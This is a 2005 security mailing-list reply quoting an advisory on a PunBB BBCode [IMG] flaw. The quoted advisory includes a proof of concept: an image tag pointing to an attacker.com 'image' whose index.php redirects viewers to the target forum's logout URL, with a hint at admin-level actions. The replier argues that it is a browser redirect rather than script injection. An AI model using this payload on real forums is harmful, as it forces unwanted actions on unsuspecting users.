-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
While this can have some drastic implications, this is not actually
script injection. You are redirecting the browser, no extra code gets
executed in the context of the PHP processor.
Any piece of software that allows for linking with offsite image
files will be vulnerable to this, not simply phpBB or PunBB. The
browser itself is interpreting the redirect request and sending
another request for the overall web page. This is effectively
impossible to filter out on the server side while still allowing
offsite linking, the only real solution is to prohibit anything that
is not controlled by the software.
AnthraX101
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBQxOv+A4h295M1tC9EQKbhgCeI5lTwRoQSsxYaWzUkXoLIinenmQAmwWi
gS8fYRhXgneGsmmo/4DMI21F
=Ng78
-----END PGP SIGNATURE-----
On 29 Aug 2005 08:49:29 -0000, y3dips@echo.or.id <y3dips@echo.or.id> wrote:
ECHO_ADV_22$2005
---------------------------------------------------------------------------
PunBB BBCode IMG Tag Script Injection Vulnerability
---------------------------------------------------------------------------
Author: y3dips
Date: August, 20th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv22-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Version: 1.2.6 and most likely below
url : http://punbb.org
Author: Rickard Andersson
Description:
PunBB is a fast and lightweight PHP powered discussion board. It is released
under the GNU Public License. Its primary goal is to be a faster, smaller and
less graphic alternative to otherwise excellent discussion boards such as
phpBB, Invision Power Board or vBulletin. PunBB has fewer features than many
other discussion boards, but is generally faster and outputs smaller pages.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
According to the issue that affect PHPBB discovered by easyex recently at
http://www.securityfocus.com/bid/14555/info , so it also affected in another
bulletin board or forum that allow BBcode such as PunBB.
The issue is due to a failure of the application to properly sanitize
user-supplied input in bbcode '[IMG]' tags included in a message or user
signature (if allowed , default is off) .
Successful exploitation of this vulnerability could permit the injection of
arbitrary HTML or script code into the browser of an unsuspecting user in the
context of the affected site.
Exploit:
~~~~~~~~
just post a message that include
[img]http://attacker.com/yuckfou.png[/img]
yuckfou.png is a folder , and include some "index.php" file
---- index.php ----
<?php
header("Location: http://target.com/punbb1.2.6/login.php?action=out&id=2";); ?>
---- eof ------
so , user with id=2 if open the topics with attacker message include will
automatically "logout"
maybe some other interesting in command could put in "index.php" with admin
priveledged *_^
THATS all
Fix
~~~
Vendor allready contacted but no responses
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff
~ waraxe , LINUX, Heintz , slimjim100 , lunix, easyex all member of waraxe
~ newbie_hacker@yahoogroups.com ,
~ #e-c-h-o & #aikmel @DALNET
Contact:
~~~~~~~~
y3dips || echo|staff
Homepage: http://y3dips.echo.or.id/
--
AnthraX101 -- PGP Key ID# 0x4CD6D0BD
Fingerprint:
8161 D008 3DAB 86C1 2CA3 AEDE 0E21 DBDE 4CD6 D0BD
